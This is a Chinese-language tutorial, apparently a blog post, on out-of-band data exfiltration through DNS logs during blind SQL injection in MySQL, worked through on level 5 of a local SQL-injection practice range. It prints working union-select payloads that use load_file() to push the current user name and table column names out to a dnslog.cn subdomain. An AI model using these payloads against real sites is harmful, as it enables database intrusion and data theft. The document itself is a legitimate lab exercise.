前置知识

DNS log即DNS日志，域名解析的记录
什么是dns解析呢
DNS解析是将域名转换为IP地址的过程。每个网站都有一个唯一的IP地址，但人们更容易记住网站的域名而不是IP地址。因此，当您在浏览器中输入域名时，计算机会向DNS服务器查询该域名对应的IP地址，然后将请求发送到该IP地址上的服务端。这个过程就是DNS解析。
配置文件 mysql.ini 中 secure_file_priv 参数需为空
secure_file_priv特性，有三种状态
secure_file_priv为null 表示不允许导入导出
secure_file_priv指定文件夹时，表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv为空，则表示没有任何限制
所有其必须为空
利用工具有两个
http://www.dnslog.cn
http://ceye.io
load_file()函数
load_file()函数在获得webshell以及提权过程中起着十分重要的作用，常被用来读取各种配置文件

开始测试

我们以sql靶场第5关为例子，使用http://www.dnslog.cn
前面的就不多说，直接到关键步骤，因为是盲注，我们尝试外带
localhost:8089/Less-5/?id=-1' union select 1,load_file(concat('\\',hex(user()),'.ngntw2.dnslog.cn\abc')),3--+
其中\\实际是\因为需要转义，hex(user())为什么要hex，因为如果带出数据有@这类符号无法带出，ngntw2.dnslog.cn为获得的域名，abc随便取，无所谓

我们刷新就发现获得的东西了，然后去解码即可
后面的步骤就和sql注入一样了，比如查字段名
http://localhost:8089/Less-5/?id=?id=-1%27%20union%20select%201,load_file(concat(%27\\%27,hex((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%22security%22%20and%20table_name=%22emails%22)),%27.ngntw2.dnslog.cn\abc%27)),3--+就不详细说了